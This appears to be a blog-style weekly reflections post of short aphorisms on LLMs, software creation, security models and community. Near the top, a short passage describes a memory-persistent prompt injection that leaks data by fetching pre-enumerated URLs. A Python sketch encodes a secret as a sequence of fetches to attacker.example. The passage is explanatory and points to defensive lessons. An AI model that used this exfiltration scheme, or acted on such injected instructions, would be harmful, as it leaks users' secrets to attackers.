I just published my weekly reflections: https://docs.google.com/document/d/1x8z6k07JqXTVIRVNr1S_7wYVl5L7IpX14gXxU1UBrGk/edit?tab=t.0#heading=h.st0cqxx5kcr

Bespoke creation vs outcomes. LLMs as gap-fillers. Faster horses. Elevated Engineering. Jargon as incantation. The digital Third Place. Cozy Community wizards. Flintstoning. Instagrammable burgers. Motivated randos.

----
I went on the Atlantic podcast with my friends and collaborators Mike Masnick and Zoe Weinberg to talk about Resonant Computing: an optimistic vision for tech in the age of AI.
Bespoke creation vs bespoke outcomes are distinct.
We used to have bespoke software creation and industrial software outcomes.
With LLMs and infinite software, we’ll have industrial software creation and bespoke software outcomes.
This week in the Wild West roundup:
The prompt injection stays active long-term in memories.
It’s an evolution of the ShadowLeak attack.
It uses pre-enumerated URLs to leak information by fetching them in sequence.
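To make the pre-enumerated-URL trick concrete, here is a minimal sketch of the encoding idea (all names and URLs are hypothetical, not from the actual attack): the attacker pre-registers one URL per possible symbol, and an injected agent leaks a secret simply by fetching those URLs in an order that spells it out.

```python
# Hypothetical sketch of exfiltration via pre-enumerated URLs.
# Each fetch looks like an innocuous GET; the *sequence* of paths
# encodes the secret, which the attacker reconstructs from server logs.

def encode_as_fetch_sequence(secret: str, base: str = "https://attacker.example/r/") -> list[str]:
    # One pre-registered URL per character, identified by its hex code.
    return [f"{base}{ord(ch):02x}" for ch in secret]

urls = encode_as_fetch_sequence("key")
# An injected agent fetching these three URLs in order leaks "key"
# without ever sending the secret in a request body.
```

The defense implication is why URL allow-listing alone is weak: each individual fetch is harmless; only the sequence is malicious.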
Ben Thompson observed this week that "Humans want humans."
Deepfates: “More people need to understand that Claude Code is a general intelligence that can do stuff on your computer.”
LLMs are clearly useful… and also the things people use them for are the dumbest things.
I love LLMs and I hate chatbots.
I think chatbots are an embarrassing party trick.
Corporations pretending to be our friends.
Depressingly, this is all people think LLMs are good for today.
LLMs have vast untapped potential to create resonance for society.
As an industry this part is just getting started.
This is the part that will grow far beyond chatbots.
Anyone can hit the photocopy button to have LLMs make slop.
The most valuable thing is having the taste of which subset is actually useful.
LLMs are gap-fillers and will fill all gaps implicitly with the most average input.
So it's your job to give them non-average gaps to fill, to inject the entropy.
If you ask it for a joke, you will get one of ten hyper-bland ones.
If you ask it for a joke about the pope, an orange, and Richard Feynman, you'll get something novel.
You'll get the most average answer to that very novel request, which will in turn be novel.
All vibecoded software today is a toy.
The first thing that can integrate with your life in a way you depend on will change the world.
An excellent piece on the Cosmos blog about Faster Horses.
The “replace workers with automated versions” default frame for AI is like pushing for faster horses.
Claude Code's infinite patience means that if it gets pointed in the wrong direction it will just plow through multiple walls and do some damage.
That means that pointing it in the right direction is significantly more important than with a human.
A new important word in the era of LLMs: elevated.
What makes you as a human special when I can replace you with a script?
Elevated and amplification are two related words around use of LLMs.
LLMs amplify whatever you apply them to.
You can apply them to something good or bad.
For example, curiosity vs laziness.
But elevated implies the resonant, positive part of amplification.
Elevated Engineering.
Elevated Engineering has three different tiers.
0-1: Enabling people to do what they couldn’t do before.
1-10: Helping people with relevant experience amplify it beyond what they could do before.
10-100: People who have not just relevant experience, but also the ability to change how they work.
They can redo how they work with these new tools.
They can change their meta.
Jargon that is understood by your collaborator is like a magic incantation.
It has to be understood by your collaborator to actually give you leverage.
LLMs are great at unpacking any jargon.
Jargon is compression.
Its usefulness in a context is precisely proportional to how inscrutable it is to outsiders.
The right jargon is extremely effective for LLMs.
A flick of the wrist.
But you have to have the relevant experience to know the right jargon.
Industrialization loses the craft.
The craft is fun to execute.
To be in your flow state.
Wu wei.
When you industrialize you go from craft work to turning a crank.
The result might be more predictable or scalable, but the joy of creation evaporates.
A feeling of ennui develops.
Simon Willison calls this, in the context of SWEs and LLMs, “deep blue.”
When things get industrialized the former default way becomes a specialty.
Before, it was just “baking.”
After industrialization, it’s now “baking from scratch.”
Before cell phones it was just a “phone.”
After cell phones, it was a “land line.”
The world moved on, and what used to be the default or even only way became a rare way.
We’ll need the same kind of shift for software engineering.
There’s the now quaint, non-default way, and the industrialized way.
Craft engineering?
Classic engineering?
It used to be the writer, the athlete, the actor, that we elevated.
But now with LLMs it will be the editor, the coach, the director who matter most.
There’s a difference between vibecoding and Elevated Engineering.
Both use LLMs in new ways.
Vibecoding is a “make it work” mindset.
A good enough, satisficing mindset.
Elevated Engineering uses LLMs to extend your expertise.
For example, say “Do property-based testing”.
Use precise jargon that gives the LLM clear direction.
Putting up the tentpoles and letting the LLM drape the canvas.
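As one illustration of what that jargon buys you: “property-based testing” means asserting an invariant over many generated inputs instead of a few hand-picked cases. Here is a minimal stdlib-only sketch of the idea (the function under test is hypothetical; real tools like Hypothesis add input strategies and shrinking):

```python
import random

def run_length_encode(s: str) -> list[tuple[str, int]]:
    # Hypothetical function under test: simple run-length encoding.
    pairs: list[tuple[str, int]] = []
    for ch in s:
        if pairs and pairs[-1][0] == ch:
            pairs[-1] = (ch, pairs[-1][1] + 1)
        else:
            pairs.append((ch, 1))
    return pairs

def run_length_decode(pairs: list[tuple[str, int]]) -> str:
    return "".join(ch * n for ch, n in pairs)

# The property: decode(encode(s)) == s for ANY string, not just chosen examples.
def check_roundtrip(trials: int = 200) -> None:
    rng = random.Random(0)  # seeded for reproducibility
    for _ in range(trials):
        s = "".join(rng.choice("ab") for _ in range(rng.randrange(20)))
        assert run_length_decode(run_length_encode(s)) == s

check_roundtrip()
```

Saying those three words to an LLM summons this whole testing discipline; spelling out the discipline from scratch would take paragraphs.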
You used to have to sell developers on Test Driven Development.
It was like eating your vegetables.
Healthy but kind of a drag.
But you don't have to sell an LLM.
They’ll just do it if you use the right magic word.
If you told a beleaguered human to eat their vegetables they might punch you!
How will LLMs affect open source quality?
It definitely undermines the business models of e.g. Tailwind.
Those models are unlikely to ever work again.
But now engineers don't need to use libraries.
"Obviously I'm not going to write my own cron syntax parser" in a world of LLMs transforms to "Obviously I won’t even consider using libraries to do that."
Open sourcing a library is a lot of effort.
It used to be that the amount of effort to write the code was large, and the amount to maintain it was large.
But now LLMs mess with that calculus.
If you can knock out 10 libraries in a day of work, you won’t bother to open source them.
The effort to maintain them dwarfs the time to create them.
The complexity threshold that makes it worth open sourcing has risen significantly.
For example, would you use Kubernetes or build your own subset?
You need the experience to guide the creation of this code well but it's super powerful.
The people who have relevant experience can get the LLMs to write bespoke “libraries” with the flick of the wrist.
Other people will not benefit from that expertise.
LLMs are the best tech in the world to cheat at homework... and simultaneously, the best tech in the world to learn new things.
Is your default tendency laziness or curiosity?
That will decide your fate in the era of LLMs.
A paper: On the slow death of scaling in AI.
When you get to the top of an s-curve, it takes time to realize.
Each step gets a smaller benefit for the same input.
At the beginning it just feels like you’ve lost your touch.
Last week I asked where the digital third place was.
Someone proposed it was Discord.
But that feels like a hollow answer to me.
The physical third places are coffee shops.
Over the last few decades, more and more coffee shops are Starbucks.
This feels the same, but is way more precarious.
A single MBA at Starbucks Corporate could, in a snap, make a decision that removes the third places across the country.
“If we put a 10 minute time limit on staying at the store, we could increase same store sales by 5%!”
To be resonant and load bearing, the third place must be open and federated, impossible for any one decider to destroy in an instant.
Imagine an inherently dangerous domain.
Like, say, working with fissile materials, or money transmission, or software security models.
There is significant downside if you get it wrong.
That means you need to be trained, and it might even need to be regulated.
But imagine someone creates a precision controlled robot arm.
The arm is programmed so it can’t do dangerous things.
Now, from a safe distance, you can operate the arm and work with dangerous but powerful materials, safely.
That precision robot arm is a hugely valuable asset that unlocks potential that was otherwise not possible.
The app model puts a significant damper on leverage from a motivated user.
The app model requires the receiver to trust the creator of the code.
That was reasonable when code was expensive and the creator was likely a business with something to lose.
But LLMs make it much more common for code to be written by some rando.
How far is the leverage of one motivated rando?
In the app model, it’s maybe 2-5x.
That is, they can grow their influence to between 2-5 people who know them well enough to trust them.
But what if you could get a multiplier of 100x or even 1000x?
That would be a radically different ecosystem.
All vibe-coding tools today create software distributed in the normal app model, which gives a ceiling of 2-5x leverage.
I don’t think people are afraid of AI in itself; rather, they’re afraid that Big Tech will steamroll them and not do what’s best for them.
Three tiers of security in a system.
1) Trivial to attack.
This is where Claude Code is today.
Don’t download code from anyone who might try to harm you!
Someone could harm you even accidentally.
2) Requires malicious intent to attack.
Sandboxing, DOM sanitization, etc.
Possible to attack, but hard to break accidentally.
You still need to trust the code to not be actively malicious.
One way is to have some kind of review from a trusted party to vouch for the code.
3) Difficult for even malicious users to attack.
The gold standard.
It takes time to get there.
But a huge unlock when you do!
Imagine watching an arch be built before you realize arches are possible.
You see all of the scaffolding as it’s built.
It looks like any other building.
Then, once it’s done, the scaffolding is removed… and it stands on its own!
A magic trick.
An app store is a load-bearing part of the app model.
It could also be temporary scaffolding to get a new negative-friction distribution model going.
LLMs haven’t seen significant traction in enterprise yet.
That’s where users are more sophisticated and willing to pay.
Getting to low-sophistication, low-willingness-to-pay consumers will be very hard for the foreseeable future.
Instead of building the best shopping list ever with perfect polish, build a really basic one that is actually integrated into your life.
If you assume an island, the former is all you can do.
The same origin model assumes the former.
The latter requires a horizontal model.
The security model we use today is verticalized, data in a silo.
If you want horizontal usage of your data, then we need a new security model.
Fabric is a good word for a substrate for cozy communities.
Fabric is inherently cozy.
Three pillars that support one another and create a flywheel.
1) Make vibecoding in the system easy enough.
2) Make the results robust enough.
3) Make the produced software resonant and engaging for cozy communities.
Focus on making useful software, then make it easy.
Lots of vibecoding tools are focusing on making shitty software quickly.
That’s a cul de sac.
Infinite software is not vibe coding.
Vibecoding is one ingredient into infinite software.
It’s now commodity.
It’s not even the most important ingredient, because now you can take it for granted.
Imagine a new open ecosystem catalyzed by a specific company.
People should bet not that the company will make it, but that the ecosystem will.
Related, but distinct.
The company is a means to an end.
The end is getting the open ecosystem to a critical mass.
Instead of optimizing for engagement, optimize for resonance.
Resonance is also engaging, it’s just only the positive valence form.
Engagement can also be the hollow form.
If you don’t specify which one, you’ll go for the easier one: the hollow one.
Resonance is also a sign of PMF.
The cozy community is the atomic unit.
We often assume that individuals are the atomic unit.
But we are constantly working with other people in small networks.
A married couple is a cozy community.
A kid’s soccer team is a cozy community.
If your planning interacts with others, that’s a cozy community.
If you have a family, your family matters more than you do individually.
For something to be a system of record, everyone who relies on it needs to use the same system.
If it’s too complex, then no one will keep it up to date.
The map won’t reflect the territory.
If it’s too simple, then it won’t be useful.
The map won’t have enough detail to navigate.
There can only be one system of record, and all collaborators have to coordinate on one.
That is an inherent balancing act.
Imagine if each cozy community had a super organizer wizard.
Capable of creating resonant magic with the flick of a wrist.
They bring a magic no one else in the community needs to understand, but everyone can benefit from.
They can go hang out with other wizards from other cozy communities to share magic spells with one another.
The super-organizer isn’t just motivated, they also can wield magic.
Cozy communities need a process for cross-pollination and percolation.
For good ideas from one cozy community to bubble over and help other communities.
The fractal nature allows different pockets, different niches.
When everything is merged into one landscape, only the fittest survive: you get the infinitely niche and the infinitely scaled, and nothing in between.
Good words are charming.
A tweet: “just mass cancelled $27k/year in subscriptions
made a claude code skill that:
1. reads credit card statements/extracts subscriptions
2. automatically asks follow-up q's to clarify which ones you want to cancel
3. actually opens chrome and literally cancels them for you”
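The first step of that skill, spotting recurring charges in a statement, is mechanical enough to sketch. Here is one hedged approach (the data shape and threshold are my assumptions, not the tweet author's implementation): group charges by merchant and amount, and flag pairs that recur across several distinct months.

```python
from collections import defaultdict

def find_subscriptions(transactions: list[dict]) -> list[tuple[str, float]]:
    """Flag (merchant, amount) pairs that recur in 3+ distinct months.
    Assumes each transaction looks like:
    {"merchant": str, "amount": float, "month": "YYYY-MM"}."""
    months: dict[tuple[str, float], set[str]] = defaultdict(set)
    for t in transactions:
        months[(t["merchant"], t["amount"])].add(t["month"])
    return sorted(key for key, ms in months.items() if len(ms) >= 3)

txns = [
    {"merchant": "StreamCo", "amount": 15.99, "month": m}
    for m in ("2025-01", "2025-02", "2025-03")
] + [{"merchant": "Cafe", "amount": 4.50, "month": "2025-02"}]
# find_subscriptions(txns) flags StreamCo but not the one-off Cafe charge.
```

The hard parts of the skill are the other two steps, clarifying intent and driving a browser, but the "analysis" core is a dozen lines.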
So much of software in the last 20 years has been predicated on software being expensive to write.
Software is expensive to write, but as the creator you get the data, which makes a moat.
But what if that first part doesn’t apply anymore?
The YC playbook by default only gives customers faster horses.
It aims for such a razor-thin PMF to then grow via gradient descent.
Things that require the customer to change how they think require too much difference to be captured in that tiny step.
The YC playbook is so hyper optimized for the same origin paradigm that everybody forgot that it could ever not work.
Imagine people who have lived in a given paradigm for their entire career.
E.g. The YC playbook paradigm, which is downstream of the same origin paradigm.
Imagine someone comes along and says they’re going to disrupt that paradigm.
It’s existentially terrifying.
Not only are you wrong but you’re in the wrong universe.
Those people would look like kooks, and be easy to dismiss, before everything was disrupted.
A 0-to-1 pattern: Flintstoning.
Imagine pushing the car with your feet.
People not looking closely will think the car is moving under its own power.
But actually it’s being driven by something very manual and non-scalable.
Fake it ‘til you make it.
Metrics are only necessary past a certain scale.
Below that scale, you don’t need metrics, and metrics are distracting and possibly misleading.
Past the critical scale though, you can’t steer by touch anymore, so you need metrics to steer by sight.
Metrics are way worse than steering by touch, but they’re the only approach that works past a certain scale.
Sudafed and the flu have a co-dependent relationship.
Sudafed solves flu-like symptoms, so you can go into the office…
…and infect your coworkers, who also now need Sudafed.
A number of tech companies act like smart people are abundant and thus replaceable.
That is their employment strategy.
Make their hiring bar high enough that working (and succeeding) in the environment is a credential.
Then just burn through people as quickly as possible, extracting as much as you can.
Make examples of the employee if there’s even a single transgression.
Make sure they’re always in fear.
A very Saruman-style employment philosophy.
I… don’t love this approach.
Someone noted this week that premium burgers have gotten increasingly difficult to eat.
They’re towering: they look great, but they’re impossible to eat.
She observed: the burger’s main imperative is not to be eaten but to be sold.
Those are distinct!
In the modern era, that difference leads to instagrammable burgers that are impossible to eat.
"I know there’s a there there, but this is not the vehicle to take us there."
It’s one thing to be able to distill complex topics to the level of The New Yorker.
It’s another thing to distill complex topics to the level of Reader’s Digest.
Past a certain level it requires an almost intellectually offensive distillation, but if you don’t do it, you can’t connect with readers who aren’t experts and aren’t that interested.
If you want someone to be loyal and authentically evangelize, go out of your way to make it clear they are not a chump.
Give them something of value they didn't even have to ask for.
People will rise or fall to your expectations.
So why not put the expectations where you want them to go?
Research and development are two different things.
Research is default divergent.
Development is default convergent.
You need both, but separately and in harmony.
Pull is default convergent.
Push is default divergent.
Deliver the mission, as quickly as possible.
But don't lose sight of the mission and climb the wrong hill.
Your capability and maturity have to be at a harmonious level to maximize learning.
If your capability is beyond your maturity, you'll get bored at the important lessons.
You won’t receive the important lessons necessary to mature.
There are some political personalities that don’t believe in any ideal.
You can't believe in any ideal and also believe in that politician.
Steering and learning are distinct.
A slime mold can learn but not steer.
Steering comes from a brain.
Steering requires a centralized component with leverage.
As an idealist sometimes we succumb to magical thinking.
"This matters so much that even if it would be a miracle to accomplish it, we should still tilt at windmills."
Personally, even if I care about the outcome a ton, I can’t care about it unless I see a plausible theory of change.
That theory of change has to lead to compounding, discontinuous changes.
It needs to be plausible, but not necessarily guaranteed.
Just that if it did happen, it wouldn’t have been a miracle.
Otherwise, I’m pouring effort into a sink that won’t improve the world.
What is your highest and best use of your effort to improve the world?
It needs to be on things that matter, and that you can move the needle on.
You need both.
Two little nuggets from the show Andor:
“An open invitation is no invitation at all.”
“The axe forgets, but the tree remembers.”
A classic quote from George Bernard Shaw:
“The reasonable man adapts himself to the world; the unreasonable one persists in trying to adapt the world to himself.
Therefore all progress depends on the unreasonable man.”
There are two different kinds of unreasonable people: Sarumans and Radagasts.